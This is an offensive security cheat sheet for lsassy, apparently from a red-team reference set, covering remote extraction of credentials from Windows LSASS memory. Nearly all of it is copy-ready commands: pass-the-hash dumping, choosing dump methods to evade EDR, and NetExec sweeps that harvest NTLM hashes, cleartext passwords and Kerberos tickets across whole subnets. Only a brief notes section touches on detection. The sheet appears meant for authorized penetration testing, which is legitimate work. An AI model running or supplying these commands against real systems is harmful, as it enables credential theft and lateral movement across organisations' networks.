← All cheat sheets

LSASSY

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

lsassy remotely extracts credentials from LSASS memory across hosts
using admin credentials, without dropping the raw dump to the attacker.
It supports multiple dump methods and integrates with NetExec for
at-scale harvesting. Post-compromise, authorized engagements only.

BASIC USAGE#

lsassy -u admin -p 'Pass' <host>               # Dump one host
lsassy -d corp.lu -u admin -p 'Pass' <host>    # With domain
lsassy -u admin -H <ntlm-hash> <host>          # Pass-the-hash
lsassy -u admin -p 'Pass' host1 host2 host3    # Multiple hosts
lsassy -u admin -p 'Pass' -t targets.txt        # Targets from file

DUMP METHODS#

lsassy -u a -p p -m comsvcs <host>              # comsvcs.dll MiniDump
lsassy -u a -p p -m dumpert <host>              # Dumpert (syscalls)
lsassy -u a -p p -m procdump <host>             # Sysinternals procdump
lsassy -u a -p p -m nanodump <host>             # nanodump
lsassy -u a -p p -m rdrleakdiag <host>          # rdrleakdiag
lsassy -m list                                   # List available methods
# Method choice affects EDR visibility - test in lab first

OUTPUT & PARSING#

lsassy -u a -p p <host> -j                        # JSON output
lsassy -u a -p p <host> -o creds.txt              # Save output
lsassy -u a -p p <host> --format grep             # Greppable
lsassy -u a -p p <host> -k                          # Keep dump file
# Parses NTLM hashes, cleartext (wdigest/tspkg), Kerberos tickets

NETEXEC INTEGRATION (AT SCALE)#

nxc smb <subnet> -u admin -p 'Pass' -M lsassy
nxc smb <subnet> -u admin -H <hash> -M lsassy
nxc smb targets.txt -u admin -p 'Pass' --local-auth -M lsassy
# Sweeps every host where the account is admin and harvests creds

OFFLINE DUMP PARSING#

lsassy -u a -p p --dumppath C:\Windows\Temp\l.dmp <host>
# Point lsassy at an existing remote dump instead of creating one
# (pairs with pypykatz for local offline parsing - see PYPYKATZ.txt)

EXAMPLES#

# Single-host harvest via pass-the-hash, JSON out
lsassy -d corp.lu -u admin -H :<nthash> -j 10.0.0.5

# Estate-wide credential sweep through NetExec
nxc smb 10.0.0.0/24 -u admin -p 'Pass' -M lsassy

# Choose a quieter dump method for a monitored environment
lsassy -d corp.lu -u admin -p 'Pass' -m dumpert 10.0.0.5

NOTES#

- lsassy needs LOCAL ADMIN on the target; it is a post-compromise
  credential-harvesting step, not initial access
- The comsvcs method is the loudest (well-signatured); dumpert/
  nanodump reduce but do not eliminate EDR detection
- lsassy avoids writing the raw LSASS dump to the attacker box by
  parsing remotely - still generates host-side telemetry
- Detection: LSASS handle opens by non-standard processes, minidump
  behaviour (see EDR-EVASION.txt, DEFENDER-KQL.txt)
- You have MIMIKATZ (on-host); lsassy is the remote/at-scale companion
  and pairs with PYPYKATZ for offline parsing
- Credential harvesting must be explicitly in scope + rules of
  engagement for FS clients